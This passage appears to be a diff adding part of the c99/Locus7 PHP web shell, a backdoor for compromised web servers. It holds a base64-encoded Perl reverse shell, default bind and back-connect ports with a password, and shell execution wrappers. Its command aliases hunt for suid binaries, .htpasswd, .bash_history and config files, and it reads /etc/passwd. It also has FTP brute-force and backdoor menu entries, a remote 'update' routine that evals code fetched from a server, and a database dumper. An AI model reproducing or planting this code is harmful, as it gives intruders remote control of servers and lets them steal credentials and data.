+ bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), + array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), + array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), + array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), + array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), + array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), + array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), + array("<br><center><b>[Enumerate]</b>",$enumerate), + array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"), + array("<b>[Tools]</b>",$surl."act=tools&d=%d"), + array("<b>[Proc.]</b>",$surl."act=processes&d=%d"), + array("<b>[FTP Brute]</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>[Sec.]</b>",$surl."act=security&d=%d"), + array("<b>[SQL]</b>",$surl."act=sql&d=%d"), + array("<b>[PHP-Code]</b>",$surl."act=eval&d=%d"), + array("<b>[Backdoor Host]</b>",$surl."act=shbd"), + array("<b>[Back-Connection]</b>",$surl."act=backc"), + array("<b>[milw0rm it!]</b>",$millink), + array("<b>[PHP-Proxy]</b>",$phprox), + array("<b>[Self remove]</b></center>",$surl."act=selfremove") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +/*function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +}*/ +/*function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +}*/ +/*function err($n,$txt='') +{ +echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '</b></div></font></td></tr></table>'; +return null; +}*/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://locus7s.com/\">x2300 Shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); + +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} + elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} + else {return "<font color=green>".view_perms(fileperms($o))."</font>";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by Locous7Shell.SQL v. ".$shver." +# Home page: http://www.Locus7s.com +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; + if ($tbl_struct) + { + echo "<td valign=\"top\"><b>Fields:</b><br>"; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} + echo "</td></tr></table>"; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "<font color=red>ON (secure)</font>"; +} +else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} +else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Locus7Shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #009900; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; 